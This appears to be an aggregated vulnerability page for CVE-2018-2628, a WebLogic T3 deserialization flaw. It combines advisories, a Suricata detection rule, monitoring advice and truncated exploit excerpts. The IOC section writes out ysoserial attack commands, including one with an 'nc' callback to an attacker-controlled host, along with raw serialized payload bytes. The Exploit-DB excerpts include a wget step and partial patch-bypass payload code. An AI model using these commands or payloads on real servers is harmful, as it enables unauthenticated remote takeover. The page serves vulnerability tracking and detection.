CVE-2018-2628
published 2018-04-19CVE-2018-2628: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-09-29
Exploited in the wild
EPSS
99.45%
99.9th percentile
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
| oracle_corporation | weblogic_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandjava -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'↗
commandpython exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient↗
bytes↗
74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a
bytes↗
000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec9
bytes↗
056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000
bytes↗
51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e
- →Monitor TCP port 7001 for inbound T3 protocol connections from untrusted sources; attackers actively scan for WebLogic on this port to deliver deserialization payloads. ↗
- →Detect T3 handshake initiation by looking for the hex string 't3 12.2.1' (ASCII of the handshake bytes) on port 7001 followed by large serialized object payloads containing the 'aced 0005' Java serialization magic bytes. ↗
- →Alert on WebLogic server logs containing 'ClassCastException: com.sun.proxy.$Proxy' cast to 'weblogic.rjvm.ClassTableEntry' — this indicates a successful initial deserialization connect-back attempt via CVE-2018-2628. ↗
- →Detect use of ysoserial JRMPClient or JRMPClient2 payloads in T3 traffic; the exploit triggers an outbound RMI/JRMP callback from the WebLogic server to an attacker-controlled listener. ↗
- →Detect the bypass payload class 'JRMPClient_20180718_bypass01' (using ReferenceWrapper_Stub) in ysoserial-generated payloads sent over T3, which bypasses the April 2018 CPU blacklist patch. ↗
- →Monitor for unexpected outbound connections from WebLogic server processes to high-numbered or unusual ports (e.g., 1099, 4040) which may indicate a successful JRMP connect-back from a deserialization exploit. ↗
- ·The April 2018 Critical Patch Update patch for CVE-2018-2628 is ineffective — it is a blacklist bypass and the vulnerability remains exploitable on patched servers. Organizations must apply the patch but should not consider patched servers fully protected. ↗
- ·RCE via CommonsCollections1 ysoserial gadget is NOT achievable on servers where Oracle removed Apache Commons Collections from the classpath (done in 2017); the deserialization still succeeds but RCE does not follow. ↗
- ·The Jdk7u21 ysoserial payload only achieves RCE on very old Java runtimes (pre-Java 7u21 patch from 2013 / pre-Java 8u patch from 2014); modern Java deployments are not vulnerable to this specific gadget chain. ↗
- ·The bypass payload (JRMPClient_20180718_bypass01 using ReferenceWrapper_Stub) was developed specifically to circumvent the blacklist introduced by the April 2018 CPU, meaning even patched servers may be vulnerable to this variant. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Oracle WebLogic Server Unspecified Vulnerability
cisa·2022-09-08·CVSS 9.8
CVE-2018-2628 [CRITICAL] CWE-502 Oracle WebLogic Server Unspecified Vulnerability
Vulnerability: Oracle WebLogic Server Unspecified Vulnerability
Affected: Oracle WebLogic Server
Oracle WebLogic Server contains an unspecified vulnerability which can allow an unauthenticated attacker with T3 network access to compromise the server.
Required Action: Apply updates per vendor instructions.
Notes: https://www.oracle.com/security-alerts/cpuapr2018.html; https://nvd.nist.gov/vuln/detail/CVE-2018-2628
Remediation Due Date: 2022-09-29
GHSA
GHSA-882j-m7wv-38p6: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components)
ghsa_unreviewed·2022-05-14
CVE-2018-2628 [CRITICAL] CWE-502 GHSA-882j-m7wv-38p6: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
VulnCheck
Oracle WebLogic Server Unspecified Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-2628 [CRITICAL] CWE-502 Oracle WebLogic Server Unspecified Vulnerability
Oracle WebLogic Server Unspecified Vulnerability
Oracle WebLogic Server contains an unspecified vulnerability which can allow an unauthenticated attacker with T3 network access to compromise the server.
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf; https://www.zscaler.com/resources/industry-reports/non-web-attack-surface-report.pdf
Exploit PoC: https://vulncheck.com/xdb/7459b9092084; https://vulncheck.com/xdb/9568d7a3210d; https://vulncheck.com/xdb/5fb56addad69; https://vulncheck.com/xdb/1502741aa6e5; https://vulncheck.com/xdb/b7a4c562d6cc
Suricata
ET EXPLOIT Oracle Weblogic Server Deserialization Remote Command Execution
suricata·2018-07-05
CVE-2018-2628 ET EXPLOIT Oracle Weblogic Server Deserialization Remote Command Execution
ET EXPLOIT Oracle Weblogic Server Deserialization Remote Command Execution
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 1024: (msg:"ET EXPLOIT Oracle Weblogic Server Deserialization Remote Command Execution"; flow:established,to_server; content:"java.rmi.registry.Registry"; fast_pattern; content:"java.lang.reflect.Proxy"; content:"java.rmi.server.RemoteObjectInvocationHandler"; content:"UnicastRef"; reference:url,exploit-db.com/exploits/44553/; reference:cve,2018-2628; classtype:attempted-user; sid:2025788; rev:1; metadata:attack_target Client_Endpoint, created_at 2018_07_05, cve CVE_2018_2628, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
exploitdb·2018-10-25
CVE-2018-3245 Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
---
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;
@SuppressWarnings ( {
"restrict
Exploit-DB
Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)
exploitdb·2018-08-13
CVE-2018-2628 Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule 'Oracle Weblogic Server Deserialization RCE',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic
Server T3 interface can send a serialized object to the interface to
execute code on vulnerable hosts.
},
'Author' =>
[
'brianwrf', # EDB PoC
'Jacob Robles' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2018-2628'],
['EDB', '44553']
],
'Privileged' => false,
'Targets' =>
[
[ 'Windows',
{
'Platform' => ['win']
}
]
],
'DefaultTarget' => 0,
'DefaultO
Exploit-DB
Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution
exploitdb·2018-04-22·CVSS 9.8
CVE-2018-2628 [CRITICAL] Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution
Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution
---
# -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Is provided only for educational or information purposes.
#
# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run below command on JRMPListener host
# 1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
# 2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
# e.g. java -cp ysoser
Metasploit
Oracle Weblogic Server Deserialization RCE
metasploit
Oracle Weblogic Server Deserialization RCE
Oracle Weblogic Server Deserialization RCE
An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts.
Nuclei
Oracle WebLogic Server Deserialization - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-2628 [CRITICAL] Oracle WebLogic Server Deserialization - Remote Code Execution
Oracle WebLogic Server Deserialization - Remote Code Execution
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.
Template:
id: CVE-2018-2628
info:
name: Oracle WebLogic Server Deserialization - Remote Code Execution
author: milo2012
severity: critical
description: |
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic S
Tenable
How Organizations Can Reduce the Economic Incentives of Vulnerabilities
blogs_tenable·2020-06-10
How Organizations Can Reduce the Economic Incentives of Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Zscaler
A look at the recent BuleHero botnet payload | Zscaler
blogs_zscaler·2019-12-12
A look at the recent BuleHero botnet payload | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Tenable
Critical Oracle WebLogic Server Flaw Still Not Patched
blogs_tenable·2018-05-01
Critical Oracle WebLogic Server Flaw Still Not Patched
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Critical Oracle WebLogic Server Flaw Still Not Patched
blogs_tenable·2018-05-01·CVSS 9.8
CVE-2018-2628 [CRITICAL] Critical Oracle WebLogic Server Flaw Still Not Patched
Blog / Cyber Exposure Alerts
Subscribe
# Critical Oracle WebLogic Server Flaw Still Not Patched
Josef Weiss
May 1, 2018
6 Min Read
One of the many issues that should have been addressed by Oracle’s Critical Patch Update for April 2018 was a fix for a flaw affecting versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 of the Oracle WebLogic Server (WLS) Java Enterprise Edition (EE) application server. This vulnerability, which has been assigned CVE-2018-2628 (CVSS Base Score: 9.8), is a critical issue that can be exploited by an attacker with network access via the T3 protocol. The T3 protocol is used to transport information between WebLogic servers and other types of Java programs. However, the patch was unsuccessful and this issue can still be exploited.
### Impact assessment
With t
Bugzilla
CVE-2018-3123 CVE-2019-2581 CVE-2019-2592 CVE-2019-2614 CVE-2019-2627 CVE-2019-2628 CVE-2019-2683 mysql:5.7/community-mysql: various flaws [fedora-29]
bugzilla·2019-05-06·CVSS 5.9
CVE-2018-3123 [MEDIUM] CVE-2018-3123 CVE-2019-2581 CVE-2019-2592 CVE-2019-2614 CVE-2019-2627 CVE-2019-2628 CVE-2019-2683 mysql:5.7/community-mysql: various flaws [fedora-29]
CVE-2018-3123 CVE-2019-2581 CVE-2019-2592 CVE-2019-2614 CVE-2019-2627 CVE-2019-2628 CVE-2019-2683 mysql:5.7/community-mysql: various flaws [fedora-29]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-29.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedp
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.htmlhttp://www.securityfocus.com/bid/103776http://www.securitytracker.com/id/1040696https://github.com/brianwrf/CVE-2018-2628https://www.exploit-db.com/exploits/44553/https://www.exploit-db.com/exploits/45193/https://www.exploit-db.com/exploits/46513/http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.htmlhttp://www.securityfocus.com/bid/103776http://www.securitytracker.com/id/1040696https://github.com/brianwrf/CVE-2018-2628https://www.exploit-db.com/exploits/44553/https://www.exploit-db.com/exploits/45193/https://www.exploit-db.com/exploits/46513/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-2628
2018-04-19
Published
2022-09-08
Added to CISA KEV
Exploited in the wild